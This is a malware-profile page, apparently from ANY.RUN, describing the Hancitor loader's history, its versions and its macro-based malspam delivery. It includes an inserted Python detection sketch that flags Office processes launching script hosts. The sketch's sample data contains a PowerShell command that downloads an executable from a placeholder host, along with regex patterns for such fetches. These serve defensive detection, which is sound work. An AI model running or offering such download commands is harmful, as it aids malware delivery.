  • First seen
    1 January, 2014
  • Last seen
    20 November, 2019

What is Hancitor malware?

Hancitor, sometimes called Tordal or Chanitor, is a loader designed to install other malware on the victim’s PC, most often Pony, Vawtrak, or DELoader. The malware has been around since 2014, and its original creators distribute it to other users as a service.

This malware can’t be considered dangerous, since even Windows Defender, Microsoft's built-in antivirus, can detect it. On top of that, because it is distributed in email spam campaigns, in many cases the emails never reach their targets and are intercepted by spam filters. In essence, the only people truly in danger of getting infected by Hancitor are those who still use older Windows versions such as Windows 7 or earlier and who either don’t have antivirus software or have disabled it. Curiously, despite such a limited “target audience”, Hancitor's creators continue to update this malware, and it is still very active to this day.

General description of the Hancitor Trojan

Creators of Hancitor provide their loader as a service to other criminals, helping to install various malware on the target PCs. The people behind Hancitor are extremely active and organized. Some researchers suspect that they work full business weeks since the surge of Hancitor attacks usually takes place on business days and falls off on the weekends, which suggests that the hackers responsible have a work structure and a schedule.

Despite that, Hancitor has not changed very much since 2016, and to this day it relies on very simple execution and evasion techniques, which makes its detection and prevention relatively easy, especially for corporate targets with adequate levels of cybersecurity.

The 2016 version of the malware had 66 functions and a size of 20 480 bytes, while the 2018 version is made up of 51 functions that amount to 20 992 bytes. One of the main differences between the versions is the lack of connectivity-check functionality in the 2018 iteration: the older iteration of Hancitor would try to connect to Google.com during execution to check for connectivity, whereas the newer iteration omits this step entirely. The newer version also makes use of RC4 encryption and contains some updated commands.

Not unlike other malware, the Hancitor Trojan uses several attack vectors to maximize its success rate. Hancitor's creators have used uncommon API abuse and PowerShell methods, among others, to ensure successful infection.

Over the last two years, over 80 variations of Hancitor were detected in the wild. Usually, a new variation would be created simply to define a new variable for a different campaign, while at other times the basic functions of the loader were completely changed and rewritten. However, such instances were rather rare, and heavily rewritten samples didn’t stick around for long. Some researchers believe that in such instances the malware authors were testing different approaches and keeping track of the infection rate to determine which changes should remain and which innovations should go.

Hancitor malware analysis

A video recorded on the ANY.RUN malware hunting service displays the execution process of Hancitor.

Figure 1: A visual graph of Hancitor execution processes generated by ANY.RUN

Figure 2: A customizable text report generated in the ANY.RUN malware hunting service

Hancitor execution process

Because of its main purpose, the execution of Hancitor doesn't look that impressive. Since the most common attack vector is malicious spam campaigns, Hancitor mostly gets onto devices through Microsoft Office files. Once the user downloads and opens the malicious file, the malware either uses a lure to trick the victim into enabling macros or uses an exploit. After that, Hancitor is either downloaded from the C2 server or dropped from the Office file. The next step is its execution, during which the malware downloads the main payload, usually a trojan such as Pony, Vawtrak, or DELoader.

Distribution of Hancitor

Hancitor is usually distributed in malspam campaigns as a malicious Microsoft Office file attachment. However, since most organizations started improving their cybersecurity measures, some campaigns distributing Hancitor instead contain a link pointing to a website from which the loader is downloaded.

In the case of distribution using .DOC attachments, the user must first download the file and then activate macros, ignoring multiple security warnings. Malware authors use lures to trick users into doing that. Some phishing emails contain an invoice or a fake payment-related document to make the user download it. In addition, attackers provide instructions to enable macros. If the user complies, the malicious macros will download Hancitor or it will be dropped from the document.

In some malspam campaigns, Hancitor was delivered to victims with .RTF documents that used an exploit to run a PowerShell command which downloaded the loader to the computer.
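The delivery chain described in the two sections above (an Office document that launches PowerShell to fetch the loader, or drops it to disk) leaves a recognizable parent/child process pattern. The following is an added detection sketch, not code from ANY.RUN or from the original page. The field names follow Sysmon process-creation events, the sample events are constructed, and the drop-path pattern is an assumption.

```python
import ntpath
import re

# Office hosts that open the .DOC/.RTF lures described above.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters a macro or exploit can use to fetch the loader.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line hints that the child process pulls content from the network.
DOWNLOAD_HINT = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest", re.I)
# User-writable locations where a dropped loader would typically land (assumption).
DROP_PATH = re.compile(r"\\(appdata|temp)\\", re.I)

def classify(event):
    """Return a finding label for one process-creation event, or None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS:
        return None
    if child in SCRIPT_HOSTS:
        if DOWNLOAD_HINT.search(event.get("CommandLine", "")):
            return "office-script-download"   # macro/exploit fetching a payload
        return "office-script-child"          # suspicious, lower confidence
    if DROP_PATH.search(event["Image"]):
        return "office-dropped-binary"        # executable dropped from the document
    return None

# Constructed sample events (not taken from a real Hancitor run).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a.exe')"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Users\alice\AppData\Local\Temp\invoice.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\invoice.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo done"},
]

def scan(events):
    """Return (index, label) for every event that matches a rule."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e))]

if __name__ == "__main__":
    for index, label in scan(SAMPLE_EVENTS):
        print(index, label, SAMPLE_EVENTS[index]["Image"])
```

The PowerShell instance started from explorer.exe is deliberately left unflagged: the signal is the Office parent, not the interpreter on its own.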

How to get more info from the analysis of Hancitor malware using ANY.RUN?

Analysts can take a look at which modules the malware uses. Choose the process by clicking on it in the process tree of the task, then click the "More info" button. In the "Advanced details of process" window, switch to the "Registry changes" tab and take a closer look.

Figure 3: Modules loaded by Hancitor


Despite its simplicity and vulnerability to even simple countermeasures, the Hancitor Trojan somehow remains an active malware that continues to target its limited demographic, evidently with a good success rate. The authors of this loader are extremely active and regularly come up with new iterations of Hancitor.

Researchers can take advantage of malware hunting services such as ANY.RUN to take Hancitor samples apart and study this loader in-depth.

